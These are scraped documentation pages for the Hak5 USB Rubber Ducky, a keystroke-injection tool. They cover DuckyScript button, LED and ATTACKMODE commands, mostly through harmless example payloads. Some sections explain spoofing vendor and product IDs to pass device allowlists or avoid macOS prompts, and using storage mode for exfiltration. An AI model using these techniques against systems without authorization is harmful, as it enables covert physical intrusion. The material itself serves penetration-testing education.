In the case of the USB Rubber Ducky, acting as a generic keyboard, that enumeration time is very short. Because drivers for USB keyboards, or a HID (Human Interface Device), are built-in, the target computer does not require an Internet connection or a lengthy download and installation time. In most cases, enumeration is only a fraction of a second. However, in some instances a slower computer may take one or two seconds to recognize the USB Rubber Ducky “keyboard” and begin accepting keystrokes. For this reason, it can be helpful to begin a payload with a DELAY statement.
The second useful place to use a `DELAY` is throughout your payload when you, as a human, would wait for some action to complete before continuing. Consider opening a web browser; the amount of time it takes for the browser to be open (on the screen) and usable by the user can vary from system to system. As humans we mostly ignore this delay because we have the ability to detect this visually and react accordingly. From your payload’s perspective however, a `DELAY` is required to instruct the USB Rubber Ducky that it needs to wait some amount of time before continuing.
* * *
[_navigate\_before_ Comments](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/comments/)
[The Button _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/)
---
# The Button | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
The Button
==========
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#overview)
-------------------------------------------------------------------------------------------
The button on the USB Rubber Ducky can be used to control payload execution.
By default, if no button definition (`BUTTON_DEF`) has yet been defined in the payload, pressing the button will invoke `ATTACKMODE STORAGE`. This will disable any further keystroke injection and effectively turning the USB Rubber Ducky into a mass storage flash drive, often referred to as “Arming Mode”.
info
Confused on how to press the button **through** the case? You may have missed it in the
" data-bs-toggle="tooltip" href="/hak5-usb-rubber-ducky/unboxing-quack-start-guide/#2.-mod-the-case-for-a-squeeze-to-press-button">Quick Start guide.
WAIT\_FOR\_BUTTON\_PRESS [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#wait_for_button_press)
------------------------------------------------------------------------------------------------------------------------
Halts payload execution until a button press is detected.
When this command is reached in the payload, no further execution will occur until the button is pressed. Additionally, while waiting for the button to be pressed, the button definition (either set using `BUTTON_DEF` or the default) will be temporarily suppressed.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#example)
STRING Press the button...
WAIT_FOR_BUTTON_PRESS
STRING The button was pressed!
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#result)
* The text “The button was pressed!” will not be typed until the button is pressed.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#example-1)
STRING Press the button 3 times...
WAIT_FOR_BUTTON_PRESS
STRING 1...
WAIT_FOR_BUTTON_PRESS
STRING 2...
WAIT_FOR_BUTTON_PRESS
STRING 3... You did it!
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#result-1)
* The button must be pressed 3 times to complete the payload.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#example-2)
LED_R
REM First Stage Payload Code...
REM Wait for operator to assess target before executing second stage.
WAIT_FOR_BUTTON_PRESS
LED_G
REM Second Stage Payload Code...
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#result-2)
* The operator is instructed to press the button as soon as the target is ready for the next stage.
* The `LED` command is used to indicate to the operator that the payload is waiting for a button press.
BUTTON\_DEF [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#button_def)
------------------------------------------------------------------------------------------------
`BUTTON_DEF` defines a special function which will execute when the button is pressed anytime throughout the payload (as long as the button control is not already in use by the `WAIT_FOR_BUTTON_PRESS` command).
By default, if no button definition (`BUTTON_DEF`) has been defined in your payload at the time the button is pressed, the button will stop all further payload execution and invoke `ATTACKMODE STORAGE` — entering the USB Rubber Ducky into arming mode.
Similar to functions (described later), which begin with `FUNCTION NAME()` and end with `END_FUNCTION`, the button definition begins with `BUTTON_DEF` and ends with `END_BUTTON`.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#example-3)
BUTTON_DEF
STRING The button was pressed!
STOP_PAYLOAD
END_BUTTON
WHILE TRUE
STRING .
DELAY 1000
END WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#result-3)
* The payload will type a period every second until the button is pressed.
* Once the button is pressed, the payload will type the text “The button was pressed!”
* After the button press text is typed, the payload will terminate.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#example-4)
BUTTON_DEF
WHILE TRUE
LED_R
DELAY 1000
LED_OFF
DELAY 1000
END_WHILE
END_BUTTON
STRING Press the button at any point to blink the LED red
WHILE TRUE
STRING .
DELAY 1000
END WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#result-4)
* If the button is pressed at any point in the payload it will stop typing “`.`” and the LED will start blink red until the device is unplugged.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#example-5)
BUTTON_DEF
REM This is the first button definition
STRINGLN The button was pressed once!
BUTTON_DEF
REM This second button definition overwrites the first
STRINGLN The button was pressed twice!
END_BUTTON
END_BUTTON
STRINGLN Press the button twice to see how nested button definitions work!
WHILE TRUE
STRING .
DELAY 1000
END WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#result-5)
* If the button is pressed once at any point in the payload it will stop typing “`.`” and the first button definition will be executed.
* When the first button definition is executed, a secondary button definition will be implemented.
* If the button pressed a second time, the newly implement second button definition will execute.
DISABLE\_BUTTON [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#disable_button)
--------------------------------------------------------------------------------------------------------
The `DISABLE_BUTTON` command prevents the button from calling the `BUTTON_DEF`.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#example-6)
BUTTON_DEF
STRING This will never execute
END_BUTTON
DISABLE_BUTTON
STRING The button is disabled
WHILE TRUE
STRING .
DELAY 1000
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#result-6)
* The `DISABLE_BUTTON` command disables the button.
* The button definition which would inject “`This will never execute`”, will never execute — even if the button is pressed.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#example-7)
ATTACKMODE_OFF
LED_OFF
DISABLE_BUTTON
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#result-7)
* The USB Rubber Ducky will be effectively disabled.
ENABLE\_BUTTON [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#enable_button)
------------------------------------------------------------------------------------------------------
The `ENABLE_BUTTON` command allows pressing the button to call the `BUTTON_DEF`.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#example-8)
BUTTON_DEF
STRINGLN The button was pressed!
STRINGLN Continuing the payload...
END_BUTTON
WHILE TRUE
DISABLE_BUTTON
STRINGLN The button is disabled for the next 5 seconds...
STRINGLN Pressing the button will do nothing...
DELAY 5000
ENABLE_BUTTON
STRINGLN The button is enabled for the next 5 seconds...
STRINGLN Pressing the button will execute the button definition...
DELAY 5000
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#result-8)
* The payload will alternate between the button being enabled and disabled.
* If the button is pressed within the 5 second disabled window, nothing will happen.
* If the button is pressed within the 5 second enabled window, the button definition will be executed and “`The button was pressed!`” will be typed.
* The payload will loop forever.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#example-9)
BUTTON_DEF
STRINGLN The button was pressed!
DISABLE_BUTTON
STRINGLN Pressing the button again will do nothing.
END_BUTTON
STRING Press the button at any time to execute the button definition
WHILE TRUE
STRING .
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#result-9)
* The payload will continuously type “`.`”.
* Pressing the button will execute the `BUTTON_DEF`.
* The `BUTTON_DEF` will type “`The button was pressed!`”, then disable itself with the `DISABLE_BUTTON` command. This will be announced by typing the message “`Pressing the button again will do nothing.`”
* The payload will continue to type “`.`” as before.
* Pressing the button again will do nothing.
Internal Variables [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#internal-variables)
---------------------------------------------------------------------------------------------------------------
The following internal variables relate to the button operation and may be used in your payload for advanced functions.
### $\_BUTTON\_ENABLED [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#_button_enabled)
Returns `TRUE` if the button is enabled or `FALSE` if the button is disabled.
IF ($_BUTTON_ENABLED == TRUE) THEN
REM The button is enabled
ELSE IF ($_BUTTON_ENABLED == FALSE) THEN
REM The button is disabled
END_IF
May be set `TRUE` to enabled the button or `FALSE` to disable the button.
$_BUTTON_ENABLED = TRUE
### $\_BUTTON\_USER\_DEFINED [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#_button_user_defined)
Returns `TRUE` if a `BUTTON_DEF` has been already defined in the payload or `FALSE` if it hasn’t and is still the default.
IF ($_BUTTON_USER_DEFINED == TRUE) THEN
REM Pressing the button will run the user defined BUTTON_DEF
END_IF
May be set `TRUE` or `FALSE`, however caution must be taken as setting `TRUE` when a `BUTTON_DEF` does not exist will cause undefined behavior.
BUTTON_DEF
$_BUTTON_USER_DEFINED = FALSE
REM Pressing the button will disable the button definition
END_BUTTON
### $\_BUTTON\_PUSH\_RECEIVED [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#_button_push_received)
Returns `TRUE` if the button has ever been pressed.
This variable may be retrieved or set.
REM Example $_BUTTON_PUSH_RECEIVED
STRING PUSH BUTTON N times within 5s
$CD = 15
WHILE ($CD > 0)
IF ($_BUTTON_PUSH_RECEIVED == TRUE) THEN
STRINGLN Passed
$_BUTTON_PUSH_RECEIVED = FALSE
END_IF
$CD = ($CD - 1)
STRING .
DELAY 200
END_WHILE
$_BUTTON_ENABLED = TRUE
$_BUTTON_PUSH_RECEIVED = FALSE
### $\_BUTTON\_TIMEOUT [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/#_button_timeout)
The button debounce, or cooldown time before counting the next button press, in milliseconds.
The default value is 1000.
* * *
[_navigate\_before_ Delays](https://docs.hak5.org/hak5-usb-rubber-ducky/ducky-script-basics/delays/)
[The LED _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/)
---
# The LED | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Overview
_article_
The LED
=======
Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#overview)
----------------------------------------------------------------------------------------
The USB Rubber Ducky includes an LED which may be helpful when deploying certain payloads where feedback is important.
Keep in mind that without modification, the LED is not visible when the USB Rubber Ducky is enclosed in its Flash Drive case.
The default behavior of the LED, which may be overridden, is as follows:
Default Behaviors [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#default-behaviors)
----------------------------------------------------------------------------------------------------------
| LED Color | LED State | Indication |
| --- | --- | --- |
| Green | Solid | Idle |
| Green | Blinking | Processing Payload |
| Red | Solid | No inject.bin found on root of SD card, or no SD card present. |
The `LED` command allows you to control the red and green LEDs on the USB Rubber Ducky. Using the `LED` command will override the default behavior.
warning
Calling `LED_G`, `LED_R`, or `LED_OFF` will automatically disable all default LED behaviors
LED\_OFF [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#led_off)
---------------------------------------------------------------------------------------
The LED\_OFF command will disable all LED modes.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#example)
ATTACKMODE HID STORAGE
LED_OFF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#result)
* The LED will turn off.
LED\_R [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#led_r)
-----------------------------------------------------------------------------------
The `LED_R` command will enable the red LED.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#example-1)
ATTACKMODE HID STORAGE
WHILE TRUE
IF ($_CAPSLOCK_ON == TRUE) THEN
LED_R
ELSE IF ($_CAPSLOCK_ON == FALSE) THEN
LED_OFF
END_IF
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#result-1)
* The LED will turn solid red while caps lock is on.
LED\_G [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#led_g)
-----------------------------------------------------------------------------------
The `LED_G` command will enable the green LED.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#example-2)
ATTACKMODE HID STORAGE
BUTTON_DEF
LED_OFF
STOP_PAYLOAD
END_BUTTON
WHILE TRUE
LED_G
DELAY 1000
LED_R
DELAY 1000
END_WHILE
* The LED will alternate between solid red and solid green at one second intervals.
* Pressing the button will turn the LED off and stop the payload.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#example-3)
ATTACKMODE HID STORAGE
WHILE TRUE
LED_R
WAIT_FOR_BUTTON_PRESS
LED_G
WAIT_FOR_BUTTON_PRESS
END_WHILE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#result-2)
* The LED will alternate between red and green after each button press.
Internal Variables [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#internal-variables)
------------------------------------------------------------------------------------------------------------
The following internal variables relate to the LED and may be used in your payload for advanced functions.
### $\_SYSTEM\_LEDS\_ENABLED [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#_system_leds_enabled)
Default set `TRUE`. May be retrieved or set.
LED behaviors for boot, `ATTACKMODE` change, and idle (payload complete).
### $\_STORAGE\_LEDS\_ENABLED [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#_storage_leds_enabled)
Default set `TRUE`. May be retrieved or set.
When `TRUE` blinks the LED red/green on storage read/write in `ATTACKMODE STORAGE`.
### $\_LED\_CONTINUOUS\_SHOW\_STORAGE\_ACTIVITY [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#_led_continuous_show_storage_activity)
Default set `FALSE`. May be retrieved or set.
When set `TRUE` and in `ATTACKMODE` that includes `STORAGE` the LED will light solid green when the storage has been inactive for longer than $`_STORAGE_ACTIVITY_TIMEOUT` (default 1000 ms). Otherwise, the LED will light red when active.
### $\_INJECTING\_LEDS\_ENABLED [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#_injecting_leds_enabled)
Default set `TRUE`. May be retrieved or set.
When `TRUE` the LED will blink green on payload execution.
### $\_EXFIL\_LEDS\_ENABLED [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#_exfil_leds_enabled)
Default set `TRUE`. May be retrieved or set.
When `TRUE` the LED will blink green during [Keystroke Reflection](https://docs.hak5.org/hak5-usb-rubber-ducky/advanced-features/exfiltration/#the-keystroke-reflection-attack)
.
### $\_LED\_SHOW\_CAPS [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#_led_show_caps)
Default set `FALSE`. May be retrieved or set.
When set `TRUE` will bind the GREEN LED state to the `CAPSLOCK` state.
### $\_LED\_SHOW\_NUM [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#_led_show_num)
Default set `FALSE`. May be retrieved or set.
When set `TRUE` will bind the RED LED state to the `NUMLOCK` state.
### $\_LED\_SHOW\_SCROLL [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-led/#_led_show_scroll)
Default set `FALSE`. May be retrieved or set.
When set `TRUE` will bind the GREEN LED state to the `SCROLLLOCK` state.
* * *
[_navigate\_before_ The Button](https://docs.hak5.org/hak5-usb-rubber-ducky/button/the-button/)
[Attack Modes _navigate\_next_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/)
---
# Attack Modes | Hak5 - USB Rubber Ducky
[](https://docs.hak5.org/hak5-usb-rubber-ducky/)
menu search Search
Enable dark mode Enable light mode
* to navigate
* to select
* to close
cancel
On this page
Table of Contents
_article_
Attack Modes
============
An attack mode is the device type that a USB hotplug attack tool, like the USB Rubber Ducky, is functioning as. The original USB Rubber Ducky had only one mode: `HID` — functioning as a keyboard.
With the introduction of the Bash Bunny, a multi-vector attack tool, the `ATTACKMODE` command was introduced to the DuckyScript language to manage multiple device functions.
Modes of Attack [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#modes-of-attack)
-----------------------------------------------------------------------------------------------------------------------------------------
The new USB Rubber Ducky supports three attack modes — `HID`, `STORAGE`, and `OFF`.
| ATTACKMODE | Description |
| --- | --- |
| `HID` | HID – Human Interface Device. Emulates a Keyboard for Keystroke Injection. |
| `STORAGE` | MSC – USB Mass Storage Emulates a Flash Drive for working with files. |
| `OFF` | Disables device enumeration by the target. |
### HID [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#hid)
The `HID` attack mode functions as a Human Interface Device (a keyboard) for keystroke injection.
### STORAGE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#storage)
The `STORAGE` attack mode functions as USB Mass Storage (a Flash Drive). This may be used for copying files to or from a target — often referred to as infiltration or exfiltration. In the `STORAGE` attack mode, the MicroSD card connected to the USB Rubber Ducky will be exposed to the target.
### OFF [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#off)
The `OFF` attack mode prevents the USB Rubber Ducky from being enumerated (seen) by the target as a connected device all together.
ATTACKMODE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#attackmode)
-------------------------------------------------------------------------------------------------------------------------------
The `ATTACKMODE` command accepts multiple parameters which describe how the device will be enumerated by the target. At a minimum, a mode (`HID`, `STORAGE` or `OFF`) must be specified.
The `ATTACKMODE` command consists of these parts
* The `ATTACKMODE` keyword
* The mode, or modes
* `HID` or `STORAGE` or `HID STORAGE` or `OFF`
* Optionally a `VID` and `PID`
* Optionally a `MAN`, `PROD` and `SERIAL`
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#example)
ATTACKMODE STORAGE
REM The USB Rubber Ducky will function as a "flash drive"
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#result)
* As the comment suggests, the USB Rubber Ducky will be recognized by the target as a benign USB flash drive.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#example-1)
ATTACKMODE HID
REM The USB Rubber Ducky will function as a "keyboard"
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#result-1)
* As the comment suggests, the USB Rubber Ducky will be recognized by the target as a USB Human Interface Device (HID) “keyboard”.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#example-2)
ATTACKMODE OFF
REM The USB Rubber Ducky will not be enumerated by the target
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#result-2)
* As the comment suggests, the USB Rubber Ducky will not be recognized by the target.
### Default Behaviors [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#default-behaviors)
If no `ATTACKMODE` command is specified as the first command (excluding `REM`), the new USB Rubber Ducky will default to the original standard `HID` mode and function as a keyboard.
Duplicate or redundant `ATTACKMODE` commands will be ignored. For example, if the ATTACKMODE is currently `STORAGE` and a new `ATTACKMODE STORAGE` command is specified, it will be ignored and the USB Rubber Ducky will not be re-enumerated by the target.
If no `BUTTON_DEF` is implemented, pressing the button will execute `ATTACKMODE STORAGE` — switching the USB Rubber Ducky into a flash drive.
If no `inject.bin` file is found on the root of the MicroSD card (the USB Rubber Ducky storage), then the device will show a red LED and execute `ATTACKMODE STORAGE`.
Multiple Attack Modes [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#multiple-attack-modes)
-----------------------------------------------------------------------------------------------------------------------------------------------------
Multiple modes may be specified simultaneously. When this is done, the USB Rubber Ducky device is recognized as what’s called “composite device”, whereby multiple functions may be defined.
For example, the USB Rubber Ducky can act as both a `HID` keyboard, and a “flash drive” `STORAGE` device.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#example-3)
ATTACKMODE HID STORAGE
REM The USB Rubber Ducky will function as both a "flash drive" and a keyboard.
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#result-3)
* As the comment suggests, the USB Rubber Ducky will be recognized by the target as a composite device with both the `HID` “keyboard” and `STORAGE` functions.
info
The order in which the `ATTACKMODE` parameters `STORAGE` and `HID` does not matter.
Changing Attack Modes [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#changing-attack-modes)
-----------------------------------------------------------------------------------------------------------------------------------------------------
The `ATTACKMODE` command may be used multiple times throughout a payload.
Changing the attack mode will cause the target to re-enumerate the device.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#example-4)
ATTACKMODE HID
DELAY 2000
STRINGLN The USB Rubber Ducky is functioning as a keyboard.
STRINGLN It will function as a flash drive for the next 30 seconds.
ATTACKMODE STORAGE
DELAY 30000
ATTACKMODE HID
DELAY 2000
STRINGLN Now the USB Rubber Ducky is back to functioning as only a keyboard.
STRINGLN For the next 30 seconds it will function as both keyboard and storage.
ATTACKMODE HID STORAGE
DELAY 30000
STRINGLN Now the USB Rubber Ducky will disable itself.
ATTACKMODE OFF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#result-4)
* This payload will begin by enumerating as a HID keyboard.
* The USB Rubber Ducky will then enumerate as a mass storage “flash drive” for 30 seconds.
* Once more it will be enumerated as only a HID keyboard.
* Next it will enumerate as both a HID keyboard and a mass storage “flash drive”.
* Finally, the device will seem to be disconnected.
VID and PID Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#vid-and-pid-overview)
---------------------------------------------------------------------------------------------------------------------------------------------------
USB devices identify themselves by combinations of **Vendor ID** and **Product ID**. These 16-bit IDs are specified in hex and are used by the target to find drivers (if necessary) for the specified device.
### Identifying Vendor and Product IDs [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#identifying-vendor-and-product-ids)
On a Linux system, the VID and PID for each connected USB device can be shown using the `lsusb` (list USB) command.

The `lsusb` command executed on a Linux system
In the above screenshot, we can see that the device with Vendor ID `046D` and Product ID `c31c` is connected to the computer. In this example, the vendor is Logitech, Inc. and the Product is Keyboard K120.
### Spoofing Vendor and Product IDs [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#spoofing-vendor-and-product-ids)
Using the `ATTACKMODE` command, the optional `VID` and `PID` parameters may be specified using the following syntax:
ATTACKMODE HID VID_046D PID_C31C
This `ATTACKMODE` command will instruct the USB Rubber Ducky to enumerate using the defined values, thus spoofing a real Logitech K120 keyboard. This can be very useful in situations where the target is configured to only allow interaction with specific devices.
| Parameter | Description | Accepted Value |
| --- | --- | --- |
| VID\_ | Vendor ID | 16 bits in HEX |
| PID\_ | Product ID | 16 bits in HEX |
A nearly complete list of VID and PID information may be found from Linux USB Project website at [http://www.linux-usb.org/usb.ids](http://www.linux-usb.org/usb.ids)
Checking this list, we can see that Apple uses the Vendor ID `05AC`. Among others, we find that the Product ID `021E` specifies the Aluminum Mini Keyboard (ISO). This is very useful when deploying payloads against macOS targets as a non-Apple keyboard will result in the Keyboard Setup Assistant opening.

Keyboard Setup Assistant from macOS 10-11

Keyboard Setup Assistant from macOS 12+
If the following `ATTACKMODE` is specified, the Keyboard Setup Assistant will be suppressed.
ATTACKMODE HID VID_05AC PID_021E
MAN, PROD and SERIAL Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#man-prod-and-serial-overview)
--------------------------------------------------------------------------------------------------------------------------------------------------------------------
In addition to the Vendor ID and Product ID parameters used to identify a USB device, the device iManufacturer (`MAN`), iProduct (`PROD`) and iSerial (`SERIAL`) may be specified using `ATTACKMODE`.
{% hint style=“info” %} When using the MAN, PROD and SERIAL parameters, all three must be specified. {% endhint %}
| Parameter | Description | Accepted Value |
| --- | --- | --- |
| MAN\_ | iManufacturer | 16 alphanumeric characters |
| PROD\_ | iProduct | 16 alphanumeric characters |
| SERIAL\_ | iSerial | 12 digits |
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#example-5)
ATTACKMODE HID VID_05AC PID_021E MAN_HAK5 PROD_DUCKY SERIAL_1337
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#result-5)
Checking `lsusb` (List USB) with the `-v` (verbose) option, we can see that the specified device includes the `VID` and `PID` values of the `Apple, Inc. Aluminum Mini Keyboard (ISO)`, however the `MAN`, `PROD` and `SERIAL` values are defined as specified using the `ATTACKMODE` command.

The `lsusb` command from a Linux system showing the USB Rubber Ducky with MAN, PROD, and SN specified
### Default Behaviors [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#default-behaviors-1)
If no `MAN`, `PROD` and `SERIAL` parameters are specified, the USB Rubber Ducky will enumerate with the defaults “`USB Input Device`” (for both `MAN` and `PROD`) and a `SERIAL` of `111111111111`.
### Advanced Usage [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#advanced-usage)
Keeping in mind that the `ATTACKMODE` command may be executed multiple times within a payload, and that device enumeration is dependant on the identifiers specified within the `ATTACKMODE` command (`VID`, `PID`, `MAN`, `PROD` and `SERIAL`), re-enumerating the device may only require changing one value — depending on the target OS. This may be useful when re-enumeration is desired.
### SERIAL\_RANDOM [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#serial_random)
If specified, the SERIAL\_RANDOM parameter will use the pseudorandom number generator to select a unique 12 digit serial number. This is covered in greater detail in the section on randomization.
#### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#example-6)
ATTACKMODE HID STORAGE MAN_HAK5 PROD_DUCKY SERIAL_RANDOM
SAVE and RESTORE Overview [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#save-and-restore-overview)
-------------------------------------------------------------------------------------------------------------------------------------------------------------
Within a payload the `ATTACKMODE` command may be executed multiple times.
In some situations it can be useful to “remember” an `ATTACKMODE` state, for later recall.
### SAVE\_ATTACKMODE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#save_attackmode)
The `SAVE_ATTACKMODE` command will save the currently running `ATTACKMODE` state (including any specified `VID`, `PID`, `MAN`, `PROD` and `SERIAL` parameters) such that it may be later restored.
#### Syntax [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#syntax)
SAVE_ATTACKMODE
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#example-7)
ATTACKMODE HID
SAVE_ATTACKMODE
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#result-6)
* The parameters `HID` of the command `ATTACKMODE` will be saved for later recall.
### RESTORE\_ATTACKMODE [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#restore_attackmode)
The `RESTORE_ATTACKMODE` command will restore a previously saved `ATTACKMODE` state.
### Example [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#example-8)
ATTACKMODE HID STORAGE VID_05AC PID_021E MAN_HAK5 PROD_DUCKY SERIAL_1337
BUTTON_DEF
RESTORE_ATTACKMODE
STRINGLN The ATTACKMODE has been restored.
END_BUTTON
STRINGLN The USB Rubber Ducky is now in a ATTACKMODE HID STORAGE.
SAVE_ATTACKMODE
STRINGLN This state has been saved. Now entering ATTACKMODE OFF...
STRINGLN Press the button to restore the ATTACKMODE.
ATTACKMODE OFF
#### Result [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#result-7)
* The USB Rubber Ducky will be recognized as a composite USB device with both `HID` and `STORAGE` features.
* Strings will be typed informing the user of the save state, the button functionality, and entering `ATTACKMODE OFF`.
* Pressing the button will restore the previously initialized `ATTACKMODE`.
Internal Variables [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#internal-variables)
-----------------------------------------------------------------------------------------------------------------------------------------------
The following internal variables relate to `ATTACKMODE` and may be used in your payload for advanced functions.
### $\_CURRENT\_VID [_link_](https://docs.hak5.org/hak5-usb-rubber-ducky/attack-modes-constants-and-variables/attack-modes/#_current_vid)
Returns the currently operating Vendor ID with endian swapped.
May only be retrieved. Cannot be set.
